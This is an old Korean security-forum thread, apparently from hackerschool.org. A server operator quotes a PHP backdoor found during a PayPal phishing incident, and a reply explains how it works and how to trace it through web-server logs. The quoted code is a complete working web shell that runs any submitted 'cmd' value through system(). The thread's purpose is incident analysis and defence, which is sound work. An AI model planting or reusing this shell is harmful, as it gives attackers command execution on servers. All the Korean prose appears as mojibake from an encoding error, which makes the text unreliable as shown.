Å©·¡Å· ÇÇÇØ

 423, 2/22 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ¸Û¸Û
   http://hackerschool.org
   [re] php ÄÚµå Å©·¡Å·¿¡ °üÇÑ ¹®ÀÇÀÔ´Ï´Ù..

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=217 [º¹»ç]


===============================================================================
>¿î¿µÇÏ°í ÀÖ´Â ¼­¹ö¿¡
><?if(count($_GET)) extract($_GET);if(count($_POST)) extract($_POST);if(count($_SERVER)) extract($_SERVER);echo "<form action=$PHP_SELF method=post>command : <input type=text name=cmd><input type=submit></form><hr>";if($cmd){$cmd = str_replace("\\", "", $cmd);echo "<pre>"; system($cmd); echo "</pre>";}?>
>
>À§ ÄÚµå¿Í ÇÔ²² paypal ÇǽÌÀ» ´çÇÏ¿´½À´Ï´Ù.
>À§ÀÇ ÄÚµåÀÇ ºÐ¼®À» ÇÊ¿ä·Î ÇÕ´Ï´Ù.
>±×·³ ¸¹Àº Á¶¾ð ºÎŹµå¸³´Ï´Ù.. °¨»çÇÕ´Ï´Ù..
===============================================================================

ÇØ´ç ¼Ò½º ÄÚµå´Â backdoorÀÇ ÀÏÁ¾À¸·Î¼­, °ø°ÝÀÚ°¡ Àü´ÞÇÑ ¹®ÀÚ¿­À»

À¥ ¼­¹ö ±ÇÇÑÀÇ ½© ¸í·ÉÀ¸·Î ½ÇÇàÇÏ´Â ¿ªÇÒÀ» ÇÕ´Ï´Ù.

À§ ¼Ò½º ÄÚµå Áß Çٽɸ¸ ³²±â¸é <? system($cmd); ?> °¡ µË´Ï´Ù.

$cmd º¯¼ö·Î Àü´ÞµÈ ¹®ÀÚ¿­À» system ÇÔ¼ö·Î ½ÇÇàÇÑ´Ü ¸»ÀÔ´Ï´Ù.

´ëÀÀ ¹æ¾ÈÀ¸·Î½á..

¸ÕÀú, À§ ¼Ò½º ÄÚµåÀÇ ÆÄÀϸíÀ» À¥ ¼­¹ö ·Î±×¿¡¼­ °Ë»öÇØ º¸½Ã±â ¹Ù¶ø´Ï´Ù.

¿¹·Î, ¾ÆÆÄÄ¡¶ó¸é grep xxx.php /var/log/httpd/access_log °°Àº ¹æ¹ýÀ¸·Î

°Ë»öÇÏ½Ã¸é µË´Ï´Ù.

±×·³ ÀÌ ¹éµµ¾î ÆÄÀÏÀ» ¿äûÇÑ ·Î±×°¡ ³ª¿Ã °ÍÀÔ´Ï´Ù. (¸¸¾à °ø°ÝÀÚ°¡ ROOT

±ÇÇѱîÁö ȹµæÇÏ¿© ·Î±×¸¦ Áö¿ö¹ö·È´Ù¸é ³ª¿ÀÁö ¾ÊÀ» ¼öµµ ÀÖ½À´Ï´Ù.)

·Î±×°¡ ³ª¿Ô´Ù¸é IP¿Í REFERER ºÎºÐÀ» º¸°í °ø°ÝÀÚÀÇ Á¤º¸¸¦ ¾òÀ» ¼ö ÀÖÀ¸¸ç,

ÃÖÃÊ xxx.php°¡ ·Î±×¿¡ ³²Àº ½Ã°£À» ±âÁ¡À¸·Î ÁÖº¯ ·Î±×¸¦ ºÐ¼®ÇØ º¸½Ã¸é

°ø°ÝÀÚ°¡ ¾î¶² ¹æ¹ýÀ» ÀÌ¿ëÇؼ­ ¼­¹ö¿¡ ħÅõÇß´ÂÁö ãÀ» ¼ö ÀÖÀ» °ÍÀÔ´Ï´Ù. (À¥ÇØÅ·À¸·Î ħÅõÇß´Ù°í °¡Á¤)

ÀÌ Á¤º¸¸¦ ±â¹ÝÀ¸·Î Ãë¾àÁ¡ ÆÐÄ¡¿Í °ø°ÝÀÚ¿¡ ´ëÇÑ ¹ýÀû ´ëÀÀÀ» ÇϽñ⠹ٶø´Ï´Ù.

  Hit : 4117     Date : 2006/06/01 07:05



    
soarrr À½ ±×·¸±º¿ä Á¶¾ð Á¤¸» °¨»çµå¸³´Ï´Ù.. 2006/06/01  
403     [re] ¸®´ª½º Å©·¡Å· Á¶¾ð ºÎŹµå¸³´Ï´Ù..[14]     ¸Û¸Û
06/28 4571
402     [re] ÄÄÇ»ÅÍ°¡ ÀÌ»óÇØ¿ä ±ÞÇØ¿ä![1]     ¸Û¸Û
06/10 4014
    [re] php ÄÚµå Å©·¡Å·¿¡ °üÇÑ ¹®ÀÇÀÔ´Ï´Ù..[1]     ¸Û¸Û
06/01 4116
400   tÀt? À̶ó´Â ÆÄÀÏÀ» ¾ø¾Ö°í ½ÍÀºµ¥¿ä..     ¸á·ÎµðÈ«Áê
10/20 3597
399   µµ¿ÍÁÖ¼¼¿ä .[8]     ´ýÅÒ
08/23 3242
398   µµ½º°ø°Ý ´çÇÑ°Í °°Àºµ¥..[6]     ´ÙÅ©·¹ÀÎÁ®
12/26 3798
397   ·¹Áö °ü·ÃÇؼ­ ¿©Âã´Ï´Ù; ÄÄÅÍ ÇãÁ¢ Àý½ÇÇÕ´Ï´Ù-[1]     ´ÚÅÍJ
03/25 3584
396   Å©·¡Å· Áú¹®¿ä.[8]     ³«¹Ù»ý
11/08 3351
395   key log(ger)ÇÁ·Î±×·¥ »ç¿ë¹ý°ú Áú¹®[4]     ³«Å¸
09/11 4067
394   Ã¥¿¡ °üÇÑ Áú¹®ÀÔ´Ï´Ù.[1]     ³ª°¡Åä0425
08/17 3256
393   Á» µµ¿ÍÁÖ¼¼¿ä~Çü´Ôµé[3]     ±è¿µÁØ
03/30 3064
392   ÀÌ·±Áú¹®ÇصµµÉÁö¸ð¸£Áö¸¸,,±Ã±ÝÇؼ­- _-;;[9]     °¡¸£ÃÄÁÖ¼¼¿ä
07/23 3575
391   Å©·¡Å· ÇÇÇØ ºÐ¼® °ÙÆÇÀ̶ó Áú¹®ÇÏ±ä ¹½ÇÏÁö¸¸....[3]     °í´¢´¢¸¶½ºÅÍ
04/01 3226
390   ³Ý¸¶ºí¾ÆÀ̵ð¸¦ÇØÅ·´çÇؼ­±×·±µ¥¿ä..[3]     ¤¾¤ÀÄ¿½ºÄð
05/24 4146
389   °­Á¦¿ø°Ý´çÇÑÀÌÈÄ·Î ¶Ç´çÇÑ?[6]     ÆĶû»õ
08/05 4141
388   ³Ýº¿ ´çÇß¾ú´Âµ¥¿ä.[3]     ÆĶû»õ
07/16 3671
387   Àú ³Ýº¿´çÇÑ°Å°°Àºµ¥¿ä ..[9]     ÆĶû»õ
06/17 3471
386   ±Ã±ÝÇÑ°ÍÀÌ 2°¡Áö ÀÖ½À´Ï´Ù.[2]     Å׶ó¹ÙÀ̽º
09/04 3247
385   Á¦±â¶ö ¾î¶² ºÀ¾ËÀÚ½ÄÀÌ ³Ý¹ö½º·Î ÇØÅ·À» ¤Ñ.¤Ñ[6]     Å©·¡Å·À»¸·ÀÚ!
04/10 4350
384   °í¼ö´Ôµé!! ÀÌ°ÅÁ» ÇØ°áÇØ ÁÖ¼¼¿ä.[4]     Å©·ç¿ÂÆ®
04/05 3502
[1] 2 [3][4][5][6][7][8][9][10]..[22]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org